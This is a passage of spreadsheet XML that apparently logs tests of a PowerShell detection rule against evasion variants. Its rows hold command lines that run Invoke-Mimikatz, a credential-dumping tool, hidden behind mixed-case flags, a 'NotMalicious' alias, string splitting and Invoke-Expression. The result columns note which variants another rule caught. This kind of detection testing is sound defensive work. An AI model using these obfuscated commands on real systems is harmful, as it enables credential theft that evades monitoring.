          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1154" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1154" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1154" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1154" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115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54" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1154" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1155" ht="15.75" customHeight="1" s="42">
      <c r="A1155" s="43" t="n"/>
      <c r="B1155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1155" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1155" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1155" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1155" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115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55" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1155" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1156" ht="15.75" customHeight="1" s="42">
      <c r="A1156" s="43" t="n"/>
      <c r="B1156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1156" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1156" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1156" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1156" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115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56" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1156" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1157" ht="15.75" customHeight="1" s="42">
      <c r="A1157" s="43" t="n"/>
      <c r="B1157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1157" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1157" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1157" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1157" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1157" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1157" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1157" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1158" ht="15.75" customHeight="1" s="42">
      <c r="A1158" s="43" t="n"/>
      <c r="B1158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1158" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1158" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1158" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1158" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1158" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1158" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1158" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1159" ht="15.75" customHeight="1" s="42">
      <c r="A1159" s="43" t="n"/>
      <c r="B1159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1159" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1159" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1159" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1159" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1159" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1160" ht="15.75" customHeight="1" s="42">
      <c r="A1160" s="43" t="n"/>
      <c r="B1160" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1160" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1160" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1160" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1160" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1160" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1161" ht="15.75" customHeight="1" s="42">
      <c r="A1161" s="43" t="n"/>
      <c r="B1161" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1161" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1161" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1161" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1161" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1161" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1161" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1162" ht="15.75" customHeight="1" s="42">
      <c r="A1162" s="43" t="n"/>
      <c r="B1162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1162" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1162" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1162" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1162" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1163" ht="15.75" customHeight="1" s="42">
      <c r="A1163" s="43" t="n"/>
      <c r="B1163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1163" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1163" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1163" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1163" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1164" ht="15.75" customHeight="1" s="42">
      <c r="A1164" s="43" t="n"/>
      <c r="B1164" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1164" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1164" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1164" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1164" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1164" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1165" ht="15.75" customHeight="1" s="42">
      <c r="A1165" s="43" t="n"/>
      <c r="B1165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1165" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1165" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1165" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1165" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1165" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1166" ht="15.75" customHeight="1" s="42">
      <c r="A1166" s="43" t="n"/>
      <c r="B1166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1166" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1166" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1166" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1166" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1166" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1167" ht="15.75" customHeight="1" s="42">
      <c r="A1167" s="43" t="n"/>
      <c r="B1167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1167" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1167" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1167" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1167" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1167" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1168" ht="15.75" customHeight="1" s="42">
      <c r="A1168" s="43" t="n"/>
      <c r="B1168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1168" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1168" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1168" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1168" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1169" ht="15.75" customHeight="1" s="42">
      <c r="A1169" s="43" t="n"/>
      <c r="B1169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1169" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1169" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1169" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1169" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1170" ht="15.75" customHeight="1" s="42">
      <c r="A1170" s="43" t="n"/>
      <c r="B1170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1170" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1170" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1170" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1170" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1171" ht="15.75" customHeight="1" s="42">
      <c r="A1171" s="43" t="n"/>
      <c r="B1171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1171" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1171" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1171" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1171" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1172" ht="15.75" customHeight="1" s="42">
      <c r="A1172" s="43" t="n"/>
      <c r="B1172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1172" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1172" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1172" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I11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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1172" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1173" ht="15.75" customHeight="1" s="42">
      <c r="A1173" s="43" t="n"/>
      <c r="B1173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1173" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1173" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1173" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1173" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1173" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1174" ht="15.75" customHeight="1" s="42">
      <c r="A1174" s="43" t="n"/>
      <c r="B1174" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1174" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1174" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1174" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1174" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1174" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1175" ht="15.75" customHeight="1" s="42">
      <c r="A1175" s="43" t="n"/>
      <c r="B1175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1175" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1175" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1175" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1175" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1175" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1176" ht="15.75" customHeight="1" s="42">
      <c r="A1176" s="43" t="n"/>
      <c r="B1176" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1176" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1176" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1176" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1176" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1176" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1177" ht="15.75" customHeight="1" s="42">
      <c r="A1177" s="43" t="n"/>
      <c r="B1177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1177" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1177" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1177" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1177" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1177" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1178" ht="15.75" customHeight="1" s="42">
      <c r="A1178" s="43" t="n"/>
      <c r="B1178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1178" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1178" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1178" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1178" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1178" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1179" ht="15.75" customHeight="1" s="42">
      <c r="A1179" s="43" t="n"/>
      <c r="B1179" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1179" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1179" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1179" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1179" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117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79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1179" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1180" ht="15.75" customHeight="1" s="42">
      <c r="A1180" s="43" t="n"/>
      <c r="B1180" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1180" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1180" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1180" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118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80" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1180" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1181" ht="15.75" customHeight="1" s="42">
      <c r="A1181" s="43" t="n"/>
      <c r="B1181" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1181" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1181" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1181" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118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81" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1181" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1182" ht="15.75" customHeight="1" s="42">
      <c r="A1182" s="43" t="n"/>
      <c r="B1182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1182" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1182" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1182" s="36" t="inlineStr">
        <is>
